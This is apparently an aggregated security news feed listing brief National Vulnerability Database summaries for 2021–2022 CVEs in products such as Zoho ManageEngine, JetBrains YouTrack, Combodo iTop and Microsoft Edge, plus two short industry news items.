‼ CVE-2021-28428 ‼
📖 Read
via "National Vulnerability Database".
File upload vulnerability in HorizontCMS before 1.0.0-beta.3 via uploading a .htaccess and *.hello files using the Media Files upload functionality. The original file upload vulnerability (CVE-2020-27387) was remediated by restricting the PHP extensions; however, we confirmed that the filter was bypassed via uploading an arbitrary .htaccess and *.hello files in order to execute PHP code to gain RCE.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-24978 ‼
📖 Read
via "National Vulnerability Database".
Zoho ManageEngine ADAudit Plus before 7055 allows authenticated Privilege Escalation on Integrated products. This occurs because a password field is present in a JSON response.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-25245 ‼
📖 Read
via "National Vulnerability Database".
Zoho ManageEngine ServiceDesk Plus before 13001 allows anyone to know the organisation's default currency name.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-26630 ‼
📖 Read
via "National Vulnerability Database".
Jellycms v3.8.1 and below was discovered to contain an arbitrary file upload vulnerability via \app.\admin\Controllers\db.php.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-28219 ‼
📖 Read
via "National Vulnerability Database".
Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-28651 ‼
📖 Read
via "National Vulnerability Database".
In JetBrains IntelliJ IDEA before 2021.3.3 it was possible to get passwords from protected fields📖 Read
via "National Vulnerability Database".
‼ CVE-2022-24811 ‼
📖 Read
via "National Vulnerability Database".
Combodi iTop is a web based IT Service Management tool. Prior to versions 2.7.6 and 3.0.0, cross-site scripting is possible for scripts outside of script tags when displaying HTML attachments. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-28648 ‼
📖 Read
via "National Vulnerability Database".
In JetBrains YouTrack before 2022.1.43563 HTML code from the issue description was being rendered📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1244 ‼
📖 Read
via "National Vulnerability Database".
heap-buffer-overflow in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is capable of inducing denial of service.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-25373 ‼
📖 Read
via "National Vulnerability Database".
Zoho ManageEngine SupportCenter Plus before 11020 allows Stored XSS in the request history.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-24780 ‼
📖 Read
via "National Vulnerability Database".
Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-28650 ‼
📖 Read
via "National Vulnerability Database".
In JetBrains YouTrack before 2022.1.43700 it was possible to inject JavaScript into Markdown in the YouTrack Classic UI📖 Read
via "National Vulnerability Database".
‼ CVE-2022-28649 ‼
📖 Read
via "National Vulnerability Database".
In JetBrains YouTrack before 2022.1.43563 it was possible to include an iframe from a third-party domain in the issue description📖 Read
via "National Vulnerability Database".
🔏 New U.S. Cybersecurity Bureau Hopes to Help Shape Policy 🔏
📖 Read
via "".
The newly formed Bureau of Cyberspace and Digital Policy aims to address the challenges of cyberspace with policy based on emerging technology.📖 Read
via "".
Digital Guardian
New U.S. Cybersecurity Bureau Hopes to Help Shape Policy
The newly formed Bureau of Cyberspace and Digital Policy aims to address the challenges of cyberspace with policy based on emerging technology.
🕴 'Human Behavior' Security Startup Nets $7M in Seed 🕴
📖 Read
via "Dark Reading".
Nudge Security plans a general launch of its cloud-based service later this year.📖 Read
via "Dark Reading".
Dark Reading
'Human Behavior' Security Startup Nets $7M in Seed
Nudge Security plans a general launch of its cloud-based service later this year.
‼ CVE-2022-24475 ‼
📖 Read
via "National Vulnerability Database".
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-23974 ‼
📖 Read
via "National Vulnerability Database".
In 0.9.3 or older versions of Apache Pinot segment upload path allowed segment directories to be imported into pinot tables. In pinot installations that allow open access to the controller a specially crafted request can potentially be exploited to cause disruption in pinot service. Pinot release 0.10.0 fixes this. See https://docs.pinot.apache.org/basics/releases/0.10.0📖 Read
via "National Vulnerability Database".
‼ CVE-2022-24523 ‼
📖 Read
via "National Vulnerability Database".
Microsoft Edge (Chromium-based) Spoofing Vulnerability.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-27123 ‼
📖 Read
via "National Vulnerability Database".
Employee Performance Evaluation v1.0 was discovered to contain a SQL injection vulnerability via the email parameter.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-27304 ‼
📖 Read
via "National Vulnerability Database".
Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via the user parameter.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-26900 ‼
📖 Read
via "National Vulnerability Database".
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912.📖 Read
via "National Vulnerability Database".